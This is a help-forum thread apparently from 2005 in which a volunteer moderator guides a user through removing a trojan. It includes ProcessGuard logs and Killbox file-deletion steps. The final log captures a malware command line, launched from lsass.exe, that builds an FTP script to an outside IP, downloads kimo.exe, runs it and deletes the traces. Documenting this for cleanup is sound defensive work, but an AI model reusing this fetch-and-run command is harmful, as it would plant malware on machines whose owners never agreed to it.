Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

help i have trojan horse collected.5.L [RESOLVED]


  • This topic is locked This topic is locked

#91
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello again just before i download this new programme i still have the avg virus warning popping up every minute with the trojan horse collected message
does this mater?
thanks for your help
  • 0

Advertisements


#92
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
If you use ProcessGuard wisely it will put an end to that.

As I told you before there is only one way to be sure the computer is clean (format)

What I will try to do now is put you in charge of the computer again instead of the rootkit.

Regards,
  • 0

#93
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello again
i am relunctant to purchase online while my system is still infected here is a log file from PG
Process Guard Log Started---
Tue 02 - 20:00:55 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Tue 02 - 20:00:55 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1344]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Tue 02 - 20:00:55 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Tue 02 - 20:00:58 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Tue 02 - 20:01:00 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Tue 02 - 20:01:00 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Tue 02 - 20:01:00 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Tue 02 - 20:01:00 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Tue 02 - 20:01:01 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Tue 02 - 20:01:01 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2004]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Tue 02 - 20:01:01 [EXECUTION] "c:\progra~1\grisoft\avgfre~1\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Tue 02 - 20:01:01 [EXECUTION] "c:\progra~1\grisoft\avgfre~1\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Tue 02 - 20:01:01 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Tue 02 - 20:01:02 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Tue 02 - 20:01:03 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Tue 02 - 20:01:03 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Tue 02 - 20:01:03 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Tue 02 - 20:01:03 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [608]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Tue 02 - 20:01:04 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Tue 02 - 20:01:04 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Tue 02 - 20:01:41 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds339aad490a6f574fb273dc16f51a9cd9 ]
Tue 02 - 20:01:42 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf947b6beb664174db9cf14e356862d2e ]
Tue 02 - 20:01:43 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsa657b0e76eab7c42830993899cea1b13 ]
Tue 02 - 20:01:43 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsc501c0215fc1c54890ffb847a83913e6 ]
Tue 02 - 20:14:49 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\program files\processguard\procguard.exe" [700]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -nohome ]
Tue 02 - 20:15:10 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_08_2005.txt ]
Tue 02 - 20:17:17 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Tue 02 - 20:23:30 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [492]
[EXECUTION] Commandline - [ cmd ]
Tue 02 - 20:23:31 [EXECUTION] "c:\windows\system32\ftp.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3320]
[EXECUTION] Commandline - [ ftp.exe -n -s:msw.dll ]
Tue 02 - 20:24:05 [EXECUTION] "c:\windows\system32\msua.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3320]
[EXECUTION] Commandline - [ msua.exe ]
Tue 02 - 20:24:05 [EXECUTION] "c:\windows\system32\mwupdate32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\msua.exe" [3420]
[EXECUTION] Commandline - [ c:\windows\system32\mwupdate32.exe 1804 "c:\windows\system32\msua.exe" ]
Tue 02 - 20:25:34 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k netsvcs ]
Tue 02 - 20:30:48 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Tue 02 - 20:30:59 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1072]

---Process Guard Log Started---
Tue 02 - 20:31:49 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Tue 02 - 20:31:49 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1336]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Tue 02 - 20:31:50 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Tue 02 - 20:31:55 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Tue 02 - 20:31:55 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Tue 02 - 20:31:55 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Tue 02 - 20:31:55 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Tue 02 - 20:31:55 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Tue 02 - 20:31:55 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Tue 02 - 20:31:56 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1992]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Tue 02 - 20:31:56 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Tue 02 - 20:31:56 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Tue 02 - 20:31:56 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Tue 02 - 20:31:56 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Tue 02 - 20:31:57 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Tue 02 - 20:31:57 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Tue 02 - 20:31:57 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [232]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Tue 02 - 20:31:58 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Tue 02 - 20:31:58 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Tue 02 - 20:31:59 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Tue 02 - 20:32:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds4f2296671bff804fa63b64010823e2c2 ]
Tue 02 - 20:32:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsb967dced95f59c4d9b71494fea294357 ]
Tue 02 - 20:32:40 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds0d7ee5485534404d82ad420d64a146b7 ]
Tue 02 - 20:32:41 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsab2a85c93f2acb4488b569f4312eb1be ]
Tue 02 - 20:34:06 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Tue 02 - 20:34:49 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\program files\processguard\procguard.exe" [376]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -nohome ]
Tue 02 - 20:35:52 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_08_2005.txt ]
thanks for your help
  • 0

#94
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Bingo :tazz:

You posted exactly the pieces with the info I needed.

In ProcessGuard uncheck the learning mode option (if still enabled) and remove the permission for c:\windows\system32\ftp.exe

* Then run Killbox by doubleclicking Killbox.exe
*In the killbox program, select the Delete on Reboot option.
*Open the text file with these instructions in it, and copy the file names below to the clipboard by highlighting them and pressing Control-C:
c:\windows\system32\mwupdate32.exe
c:\windows\system32\msua.exe


*Return to Killbox, go to the File menu, and choose "Paste from Clipboard".
*Click the red-and-white "Delete File" button. Click "Yes" at the Delete on Reboot prompt. Click "No" at the Pending Operations prompt.

Let the computer reboot and find the file:
msw.dll (probably also in c:\windows\system32)

Have that file and c:\windows\system32\ftp.exe scanned at:
http://virusscan.jotti.org/

Post the results of that scan please.

Regards,
  • 0

#95
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello again couldnt find msw.dll but did find 2 copies ftp.exe one was in dll file
here is scan results
ftp.exe
Status:
OK
MD5 358f2b1b49483485ce95d68739237ad4
Packers detected:
-
Scanner results
AntiVir
Found nothing
ArcaVir
Found nothing
Avast
Found nothing
AVG Antivirus
Found nothing
BitDefender
Found nothing
ClamAV
Found nothing
Dr.Web
Found nothing
F-Prot Antivirus
Found nothing
Fortinet
Found nothing
Kaspersky Anti-Virus
Found nothing
NOD32
Found nothing
Norman Virus Control
Found nothing
UNA
Found nothing
VBA32
Found nothing
thanks for your help
  • 0

#96
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Can you try this for me?
(Assuming you did delete the other two files) and are still using ProcessGuard to block the unknown.

ftp.exe is the real file but it is being abused to perform tasks encoded in msw.dll

*Run Killbox again and use Standard File Kill
*Copy & paste this into the Full Path for File to Delete box:

c:\windows\system32\msw.dll

*Click the red-and-white "Delete File" button.

If this was successfull a folder C:\!Submit will be created with subfolders named after the date and a copy of the deleted file inside.

Let me know if it is.

Also let me know if the alarms by AVG have stopped after you deleted the other two files.

Regards,
  • 0

#97
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello
killbox said the file c:\windows\system32\msw.dll does not exist also still getting avg popups after deleting last 2 files also had the ftp programme try to run when typing this so i did not allow it to through PG
thanks for your patience
  • 0

#98
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Can you post some ProcessGuard logs from next time when AVG sounds the alarm?

I'd like to have another look. See if we can figure out what triggers these infections.

Regards,
  • 0

#99
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
log file for today
---Process Guard Log Started---
Thu 04 - 17:46:21 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Thu 04 - 17:46:21 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1332]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Thu 04 - 17:46:22 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Thu 04 - 17:46:22 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1204]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" /sched=5 ]
Thu 04 - 17:46:26 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Thu 04 - 17:46:26 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Thu 04 - 17:46:27 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Thu 04 - 17:46:27 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Thu 04 - 17:46:27 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Thu 04 - 17:46:27 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Thu 04 - 17:46:27 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2020]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Thu 04 - 17:46:27 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Thu 04 - 17:46:28 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Thu 04 - 17:46:28 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Thu 04 - 17:46:29 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Thu 04 - 17:46:29 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Thu 04 - 17:46:30 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Thu 04 - 17:46:30 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Thu 04 - 17:46:31 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Thu 04 - 17:46:31 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [452]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Thu 04 - 17:46:31 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Thu 04 - 17:47:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds5ceb59ee3dfb9e449890ecd430cfefc5 ]
Thu 04 - 17:47:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf99d48a949d1794aab3ebe4ca59bc6f1 ]
Thu 04 - 17:47:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds7795f4279bf4ca46a9081197841552e3 ]
Thu 04 - 17:47:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsda5087beca8394488d3e4423ff18d8f2 ]
Thu 04 - 17:48:45 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Thu 04 - 17:49:02 [EXECUTION] "c:\documents and settings\dug and tania\desktop\killbox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\desktop\killbox.exe" ]
Thu 04 - 17:50:34 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [488]
[EXECUTION] Commandline - [ cmd ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\ftp.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1708]
[EXECUTION] Commandline - [ ftp.exe -n -s:cdtime.asp ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [488]
[EXECUTION] Commandline - [ cmd /c echo open 205.177.75.19 58739 >cdtime.asp &cmd /c echo user wh0re got[bleep]ed >>cdtime.asp &cmd /c echo binary >>cdtime.asp &cmd /c echo get kimo.exe >>cdtime.asp &cmd /c echo bye >>cdtime.asp &cmd /c ftp.exe -n -s:cdtime.asp &cmd /c del cdtime.asp &start kimo.exe
]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c echo user wh0re got[bleep]ed ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c echo binary ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c echo get kimo.exe ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c echo bye ]
Thu 04 - 17:50:46 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c ftp.exe -n -s:cdtime.asp ]
Thu 04 - 17:50:48 [EXECUTION] "c:\windows\system32\ftp.exe" was blocked from running
[EXECUTION] Started by "Unknown Process" [1844]
[EXECUTION] Commandline - [ ftp.exe -n -s:cdtime.asp ]
Thu 04 - 17:50:48 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c del cdtime.asp ]
Thu 04 - 19:00:51 [EXECUTION] "c:\windows\system32\defrag.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\defrag.exe" -p 2a4 -s 000013d4 -b c: ]
Thu 04 - 19:00:52 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsff9590f5c1608e44bf9ad392550e60d0 ]
Thu 04 - 19:00:52 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsaf71e58616f3534196e4c1642b9d4509 ]
Thu 04 - 19:01:29 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Thu 04 - 19:13:25 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
